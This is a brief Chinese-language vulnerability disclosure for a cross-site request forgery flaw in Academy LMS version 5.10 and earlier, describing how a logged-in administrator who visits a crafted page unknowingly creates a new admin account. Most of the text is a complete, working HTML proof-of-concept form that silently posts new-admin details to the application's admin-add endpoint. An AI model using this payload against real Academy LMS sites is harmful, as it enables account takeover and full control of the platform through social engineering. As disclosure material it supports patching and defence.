Academy LMS <= 5.10 CSRF
Academy LMS 是一个允许用户创建和推广课程的应用程序。其添加新管理用户的功能存在 CSRF 漏洞,使得通过社会工程学手段获取平台管理员权限成为可能。
概念验证的第一步是使用管理员用户身份登录平台。
之后,只需访问包含漏洞利用代码的页面,即可看到系统中已添加了一个新的管理员用户。
漏洞利用所使用的代码如下:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/academy/admin/admins/add" method="POST">
<input type="hidden" name="first_name" value="csrf" />
<input type="hidden" name="last_name" value="vinix" />
<input type="hidden" name="biography" value="<p>csrf poc</p>" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="user_image" value="" />
<input type="hidden" name="email" value="username" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="facebook_link" value="" />
<input type="hidden" name="twitter_link" value="" />
<input type="hidden" name="linkedin_link" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>